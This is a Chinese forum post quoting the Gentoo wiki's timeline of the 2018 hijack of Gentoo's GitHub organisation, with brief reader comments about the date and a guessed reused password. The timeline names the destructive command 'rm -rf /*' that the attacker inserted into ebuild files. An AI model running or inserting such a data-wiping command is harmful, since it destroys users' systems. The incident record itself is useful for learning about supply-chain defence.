Gentoo Linu
x github 账号 6 月 28 日 被黑,所有 ebuild 文件被加入 rm -rf
- 0次
- 2021-06-23 12:38:42
- idczone
2018-06-28
20:05 2nd to last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 38281f4252f89e3ef9cbae54dfc1ad553d296979
20:08 Last known legimate commit to gentoo/musl. matches git.gentoo.org/proj/musl.git.
Commit ID 60461ca1385809bacf6a114a7f1ecfe22f6da47f
20:19 Attacker tries a bad password on the account.
20:19 Attacker successfully gains administrative access
20:25 Attacker invites a dummy account to the org
20:25 Attacker creates a dummy account with administrative access.
20:25 Last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 73b724093b9c2a8756b8c35d3e09793342fa9ca9
Does NOT appear in the GitHub audit log for the org.
20:25 Attacker starts removing valid users
20:26 Earliest email timestamp of someone being removed from the organization.
20:29 First person notices that something is going on with the GitHub organization
20:30 Attacker invites a second malicious user.
20:32 Attacker adds second malicious user with admin privileges.
20:34 Malicious commit to gentoo/gentoo, 73b72409->fdd8da2e
adds readme.me file with racist text.
20:36 First report to Infra that something is going on with the GitHub organization.
20:38 Malicious commit to gentoo/gentoo, fdd8da2e->49464b73.
adds rm -rf /*& at the top of skel.ebuild
20:39 Attacker changes billing email, the first time.
20:45 Malicious commit 49464b73 is first noticed
20:48 Attacker changes billing email, the second time
20:49 First abuse report to GitHub support
20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b.
adds rm -rf /* at the top of every ebuild.
20:51 Infra's informal contact to GitHub via multiple personal channels
20:53 Second abuse report to GitHub
20:55 Malicious commit to gentoo/gentoo, afcdc03b->e6db0eb4, force-push.
Squash of entire history as of afcdc03b (rm -rf /* in ebuilds)
……
Via: https://wiki.gentoo.org/wiki/Github/2018-06-28
致远星战况如何
楼主在发帖前能看看今天几号吗
当时就制止了
如果你不是 G 粉,请先不要没看链接就开喷,官方昨晚才宣布这次事故 resolved.
我希望分享的是一个 story 而不是一个 news.
一楼起的坏头
不过我还是没看明白怎么弄到的 Github 账号,暴力穷举?"tries a bad password"
貌似是管理员的密码跨站重用
没开两步验证吗?